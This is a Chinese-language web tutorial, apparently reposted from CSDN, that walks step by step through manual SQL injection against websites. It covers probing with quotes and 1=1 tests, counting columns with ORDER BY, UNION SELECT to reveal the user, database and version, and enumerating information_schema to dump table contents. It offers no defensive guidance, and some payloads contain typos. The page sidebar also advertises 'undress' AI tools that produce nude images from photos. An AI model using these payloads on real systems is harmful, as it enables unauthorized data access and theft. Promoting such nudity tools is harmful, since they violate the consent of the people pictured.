搜尋
首頁資料庫SQL一起聊聊簡單的sql手工注入過程

這篇文章為大家帶來了關於sql中手工注入的相關問題,其中包括判斷注入點以及判斷注入類型的相關問題,希望對大家有幫助。

一起聊聊簡單的sql手工注入過程

判斷注入點

1.單引號法:直接在網址後面加上一個單引號,如果頁面無法正常顯示,瀏覽器回傳一些異常訊息,則表示該連結可能存在sql注入漏洞

2.1=1和1=2:在網址後面的get傳參加上and 1=1 ,顯示正常,把1=1替換為1 =2,顯示異常,表示網頁存在sql注入。

判斷注入型別

1.數字型注入:注入變數的值不需要用引號引起來,如

select * from user where id=$id;

2.字元型注入:注入變數會用引號包裹起來,如`

select * from user where username='$username';`

注入時注意要閉合引號。
3.搜尋型注入:

select * from user where username like '%$pass%';

把sql語句建構成

select * from user where username like '%$pass%' union select语句 '%%';

即傳輸的變數為 pass%’ union select語句 '% 形成閉合。

判斷注入點提交方式

透過抓包等方式判斷注入點的提交方式是get,post,還是cookie。

使用order by 查詢字段

使用order by 語句可以查詢出資料庫有多少個字段,可以透過不斷的嘗試來確定資料庫字段數量,如在輸入oeder by 9時,頁面報錯而輸入order by 8時頁面顯示正常,即資料庫中有8個欄位。
如查詢語句為:select * from user where id='$id';
可以建構下面的輸入:(id = ') ' order by 3 ' --
即查詢語句為:select * from user where id='' order by 3 '--'

使用聯合查詢來查詢目前資料庫、使用者、版本資訊

使用union select 語句來查詢目前使用使用者user() ,資料庫database() ,資料庫版本version() ,伺服器作業系統的@@version_compile_os等資訊
version版本十分重要,如果版本在5.0以上,就可以使用information_schema函式庫輕易的查詢想要的資訊
建構語句:

select * from user where id='' union select user(),database(),version()+--+;

查詢目前資料庫中的表,列和值

#5.0 版本以上的mysql資料庫自帶的information_schema函式庫中儲存著資料庫中所有的表名和列明資訊。
下面我們就應該根據第五步驟查詢的目前資料庫的結果(如資料庫為database_1)名下所有的表名tables的資訊。
Information_schema.tables :記錄著資料庫中所有表名資訊的表。
建構的查詢語句如下:

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查詢的結果為:第五步驟查詢的目前資料庫中的表名資訊。
Information_schema.columns:記錄資料庫中所有的表中的列名資訊;
下面就應該根據上面查詢得到的表名資訊(如表為table_1)查詢他的列名信息,建構語句如下:

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查詢出列名後,就可以直接透過聯合查詢查出表中儲存的資訊(如查出的列名為column_1,column_2)建構語句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查詢指定資料庫指定表格的儲存資料

推薦學習:mysql影片教學

以上是一起聊聊簡單的sql手工注入過程的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:CSDN。如有侵權,請聯絡admin@php.cn刪除
SQL:命令,mysql:引擎SQL:命令,mysql:引擎Apr 15, 2025 am 12:04 AM

SQL命令在MySQL中分為DQL、DDL、DML、DCL和TCL五類,用於定義、操作和控制數據庫數據。 MySQL通過詞法分析、語法分析、優化和執行等階段處理SQL命令,並利用索引和查詢優化器提升性能。使用示例包括SELECT用於數據查詢,JOIN用於多表操作。常見錯誤有語法、邏輯和性能問題,優化策略包括使用索引、優化查詢和選擇合適的存儲引擎。

用於數據分析的SQL:商業智能的高級技術用於數據分析的SQL:商業智能的高級技術Apr 14, 2025 am 12:02 AM

SQL的高級查詢技巧包括子查詢、窗口函數、CTE和復雜JOIN,能夠處理複雜數據分析需求。 1)子查詢用於找出每個部門工資最高的員工。 2)窗口函數和CTE用於分析員工的薪資增長趨勢。 3)性能優化策略包括索引優化、查詢重寫和使用分區表。

MySQL:SQL的特定實現MySQL:SQL的特定實現Apr 13, 2025 am 12:02 AM

MySQL是開源的關係型數據庫管理系統,提供了標準SQL功能和擴展。 1)MySQL支持標準SQL操作如CREATE、INSERT、UPDATE、DELETE,並擴展了LIMIT子句。 2)它使用InnoDB和MyISAM等存儲引擎,適用於不同場景。 3)用戶可以通過創建表、插入數據和使用存儲過程等高級功能高效使用MySQL。

SQL:使所有人都可以訪問數據管理SQL:使所有人都可以訪問數據管理Apr 12, 2025 am 12:14 AM

sqlmakesdatamanagectAccessibletoAllbyProvidingAsimpleyetpoperfultoolSetSetForQuerquereingAndManagingDatabases.1)ItworkswithrelationalDatabases,允許inserstospecefifywhattheywanttododowithththedata.2)

SQL索引策略:通過數量級提高查詢性能SQL索引策略:通過數量級提高查詢性能Apr 11, 2025 am 12:04 AM

SQL索引可以通过巧妙的设计显著提升查询性能。1.选择合适的索引类型,如B-tree、哈希或全文索引。2.使用复合索引优化多字段查询。3.避免过度索引以减少数据维护开销。4.定期维护索引,包括重建和移除不必要的索引。

sql怎麼刪除約束sql怎麼刪除約束Apr 10, 2025 pm 12:21 PM

在 SQL 中刪除約束,請執行以下步驟:識別要刪除的約束名稱;使用 ALTER TABLE 語句:ALTER TABLE 表名 DROP CONSTRAINT 約束名;確認刪除。

sql觸發器怎麼設置sql觸發器怎麼設置Apr 10, 2025 pm 12:18 PM

SQL 觸發器是一種在指定表上執行特定事件時自動執行特定操作的數據庫對象。要設置 SQL 觸發器,可以使用 CREATE TRIGGER 語句,其中包括觸發器名稱、表名稱、事件類型和触發器代碼。觸發器代碼使用 AS 關鍵字進行定義,並包含 SQL 或 PL/SQL 語句或塊。通過指定觸發器條件,可以使用 WHERE 子句限制觸發器的執行範圍。可以使用 INSERT INTO、UPDATE 或 DELETE 語句在觸發器代碼中執行觸發器操作。 NEW 和 OLD 關鍵字可以在觸發器代碼中用來引用受影

sql查詢怎麼加索引sql查詢怎麼加索引Apr 10, 2025 pm 12:15 PM

索引是一種通過排序數據列來加速數據查找的數據結構。為 SQL 查詢添加索引的步驟如下:確定需要索引的列。選擇合適的索引類型(B 樹、哈希或位圖)。使用 CREATE INDEX 命令創建索引。定期重建或重新組織索引以維護其效率。添加索引的好處包括提高查詢性能、減少 I/O 操作、優化排序和篩選以及提高並發性。當查詢經常使用特定列、返回大量數據需要排序或分組、涉及多個表或數據庫表較大時,應該考慮添加索引。

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
4 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
4 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您聽不到任何人,如何修復音頻
4 週前By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:如何解鎖Myrise中的所有內容
1 個月前By尊渡假赌尊渡假赌尊渡假赌

熱工具

MantisBT

MantisBT

Mantis是一個易於部署的基於Web的缺陷追蹤工具,用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 英文版

SublimeText3 英文版

推薦:為Win版本,支援程式碼提示!

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版